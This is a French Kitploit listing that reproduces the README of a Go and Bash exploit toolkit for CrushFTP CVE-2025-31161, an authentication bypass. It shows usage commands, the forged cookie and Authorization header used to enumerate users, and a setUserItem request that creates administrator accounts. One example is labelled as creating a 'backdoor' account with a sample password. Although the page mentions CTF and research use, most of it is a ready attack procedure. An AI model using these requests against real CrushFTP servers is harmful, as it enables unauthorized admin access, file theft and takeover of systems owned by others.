Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CrushFTP-auth-bypass-CVE-2025-31161 — Exploit pour CrushFTP CVE-2025-31161 contournement d'authentification : détecte les cibles vulnérables, énumère les utilisateurs et crée des comptes administrateur non autorisés via des requêtes HTTP conçues en Go et Bash. | Kitploit
Outils/GitHubGitHub/0xdtc/crushftp-auth-bypass-cve-2025-31161
Authentification et AutorisationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Apprentissage et Éducation
Red Teaming
GitHub0xdtc/crushftp-auth-bypass-cve-2025-31161

CrushFTP-auth-bypass-CVE-2025-31161

Exploit pour CrushFTP CVE-2025-31161 contournement d'authentification : détecte les cibles vulnérables, énumère les utilisateurs et crée des comptes administrateur non autorisés via des requêtes HTTP conçues en Go et Bash.

Voir le dépôt
9il y a 0 ansPas encore vérifié
Partager

Contournement d'authentification CrushFTP - CVE-2025-31161

License: MIT CVE Go Bash

Une boîte à outils complète pour exploiter CVE-2025-31161, une vulnérabilité de contournement d'authentification dans CrushFTP qui permet la création non autorisée de comptes utilisateurs.

🔍 Qu'est-ce que CVE-2025-31161 ?

CVE-2025-31161 est une vulnérabilité critique de contournement d'authentification dans CrushFTP qui permet aux attaquants de créer des comptes utilisateurs non autorisés sans authentification appropriée. Cette vulnérabilité existe dans la fonctionnalité de gestion des utilisateurs de l'interface web.

Détails techniques

  • Score CVSS : À déterminer
  • Logiciel concerné : Interface Web CrushFTP
  • Vecteur d'attaque : Réseau
  • Authentification requise : Aucune
  • Impact : Compromission complète du système via création non autorisée de comptes

🚀 Fonctionnalités

  • Support multi-langage : Implémentations Go et Bash
  • Détection intelligente de vulnérabilité : Vérifie automatiquement si la cible est vulnérable avant exploitation
  • Énumération des utilisateurs : Liste les utilisateurs existants sur les cibles vulnérables
  • Création d'utilisateurs : Crée de nouveaux comptes administrateurs
  • Mode interactif : Demande les identifiants uniquement lorsque la cible est confirmée vulnérable
  • Indicateurs abrégés : Accès rapide avec les indicateurs -t, -p, -tu
  • Support de port personnalisé : Port configurable pour différents scénarios de déploiement
  • Orientation pédagogique : Conçu pour les défis CTF et la recherche en sécurité

📁 Structure du dépôt

CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # This documentation
├── cve-2025-31161.go        # Go implementation (recommended)
├── cve-2025-31161.sh        # Bash implementation
└── LICENSE                  # MIT License

🛠️ Installation et prérequis

Prérequis

Pour la version Go (recommandée)

# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

Pour la version Bash

# Requires curl (usually pre-installed)
sudo apt install curl

Configuration rapide

git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh

🎯 Utilisation

Version Go (recommandée)

Lister les utilisateurs

# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu

# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu

# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu

Ajouter un nouvel utilisateur

# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au

# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au

# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au

Version Bash

Lister les utilisateurs

# Basic usage
./cve-2025-31161.sh -t example.com -lu

# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu

Ajouter un nouvel utilisateur

# Create new user
./cve-2025-31161.sh -t example.com -au

# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au

Indicateurs disponibles

IndicateurForme longueDescriptionDéfaut
-t--target_hostNom d'hôte ou IP cible (obligatoire)-
-p--portPort cible80
-tu--target_userUtilisateur cible pour l'exploitationcrushadmin
-lu--list-usersLister les utilisateurs existants-
-au--add-userAjouter un nouvel utilisateur (interactif)-
--helpAfficher le message d'aide-

Exemples d'utilisation

# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu

# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123

# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu

# View help
./cve-2025-31161.sh --help

🔄 Comment ça fonctionne

flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I{Mode Selected?}
    I -->|List Users -lu| J[Parse XML Response]
    J --> K[Display User List]
    K --> L[Exit: Success]
    I -->|Add User -au| M[Prompt for Username]
    M --> N[Prompt for Password]
    N --> O[Send Warm-up Request]
    O --> P[Craft User Creation Payload]
    P --> Q[Send setUserItem Request]
    Q --> R{User Created Successfully?}
    R -->|Yes| S[Success: Account Created]
    R -->|No| T[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style K fill:#81c784
    style S fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style T fill:#ffcdd2

🧪 Explication du flux d'exploitation

Étape 1 : Détection de la vulnérabilité

Le script envoie d'abord une requête getUserList pour vérifier si la cible est vulnérable :

GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

Si la réponse contient <response_status>OK</response_status>, la cible est vulnérable.

Étape 2a : Énumération des utilisateurs (mode Lister)

Lors de l'utilisation du drapeau -lu, le script analyse la réponse XML et extrait les noms d'utilisateurs :

<user_list type="vector">
    <user_list_subitem>ben</user_list_subitem>
    <user_list_subitem>crushadmin</user_list_subitem>
    <user_list_subitem>default</user_list_subitem>
</user_list>

Sortie :

[+] Users:
  - ben
  - crushadmin
  - default

Étape 2b : Création de compte utilisateur (mode Ajouter)

Lors de l'utilisation du drapeau -au, le script envoie une requête setUserItem avec une charge utile XML malveillante :

POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If

Étape 3 : Vérification

Le script vérifie la présence de <response_status>OK</response_status> dans la réponse pour confirmer la création réussie de l'utilisateur.


⚠️ Détails de la vulnérabilité

Cause racine

La vulnérabilité provient de vérifications d'authentification insuffisantes dans la fonctionnalité de gestion des utilisateurs de l'interface web CrushFTP. L'application accepte les demandes de création d'utilisateurs sans valider correctement les permissions de l'appelant.

Évaluation de l'impact

  • Confidentialité : ÉLEVÉE - Accès non autorisé au système de fichiers
  • Intégrité : ÉLEVÉE - Capacité à modifier/télécharger des fichiers
  • Disponibilité : MOYENNE - Potentiel d'épuisement des ressources
Télécharger l’outil